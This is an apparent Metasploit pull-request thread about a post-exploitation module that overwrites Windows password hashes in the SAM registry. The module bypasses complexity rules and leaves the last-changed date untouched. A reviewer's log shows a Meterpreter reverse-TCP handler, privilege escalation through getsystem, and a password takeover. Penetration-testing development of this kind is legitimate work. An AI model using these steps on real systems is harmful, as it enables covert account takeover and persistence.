Module that changes a user's passwords by editing the SAM registry

[p3nt4]

Overview

This module changes a user's password by carving a hash in the windows registry.

1. It doesn't change the "password last changed" field
2. You can set a hash directly, so you can change a user's password and revert it without cracking it's hash.
3. It bypasses the password complexity requirements

Module Options

• USER - This option allows you to specify the user you wish to change the password of.
• PASS - This option allows you to specify the password to be set in the form of a clear text password, a single NT hash, or a couple of LM:NT hashes.

Module Process

Here is the process that the module follows:

• Retrieves list of users from the registry.
• If the user is found it attempts to:
  • load the user key from the registry
  • check if the lm and nt hashes exit in the key
  • replace the hashes if they exist
  • write they user key back into the registry

Recommandations

I would recommand to use hashdump before using the module to backup the user hashes
Use at your own risk.

Limitations

At some point, Windows 10 stopped storing users in that exact way, users whose password was set after that change would not be vulnerable. This will be updated once someone figures how the hashes are now stored.

The module does not modify the user key architecture, you cannot set a hash on a user that does not have a password.

Usage

• run post/windows/manage/hashcarve user=test pass=password
• run post/windows/manage/hashcarve user=test pass=nthash
• run post/windows/manage/hashcarve user=test pass=lmhash:nthash

[mubix]

This is pretty awesome, not sure I'll have time to test soon but certainly a useful module

[bwatters-r7]

Testing

Win7x64:

bwatters@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole -q
msf exploit(handler) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (1189935 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <TARGET_IP>:49167) at 2016-12-16 12:55:28 -0600

meterpreter > sysinfo
Computer        : WIN-CMLEMCUFOB2
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-CMLEMCUFOB2\bwatters
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
Background session 1? [y/N]  y
msf exploit(handler) > use post/windows/manage/hashcarve 
msf post(hashcarve) > set user bwatters
user => bwatters
msf post(hashcarve) > set pass newpassword
pass => newpassword
msf post(hashcarve) > set session 1
session => 1

msf post(hashcarve) > run

[*] Password detected as clear text, generating hashes:
LM Hash: <HASH>
NT Hash: <HASH>
[*] Searching for user
User found with id: 000003e8
[*] Loading user key
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY <KEY>...
[*] Modifying user key
[*] Modifiying LM hash
[-] LM hash does not exist, skipping
[*] Modifiying NT hash
[*] Carving user key
[*] Completed! Let's hope for the best
[*] Post module execution completed
[*] <TARGET_IP> - Meterpreter session 1 closed.  Reason: Died
msf post(hashcarve) > 

I should specify that it worked.
Very cool module!

[bwatters-r7]

Also, FYI, works on 8.1x64.

[p3nt4]

Thanks for reviewing.

Did it crash you box?

Lsass would often crash while I was researching this but haven't had an issue with the latest version of the code.

[bwatters-r7]

Not at all; worked like a charm on both 7x64 and 8.1x64 no crashes, hiccups, or odd behavior. Well, it is an odd sensation logging into Windows with just the character 'x'....

[p3nt4]

Cool. Was confused by your test as the session died.
Glad you like it.

[bwatters-r7]

heh..... nope. That was me rebooting the VM to see if the changes would persist/flag anything. Just too lazy to exit first.

[tdoan-r7]

Release Notes

The hashcarve module is now available in the framework. You can use it to change a user's password by carving a hash in the Windows registry.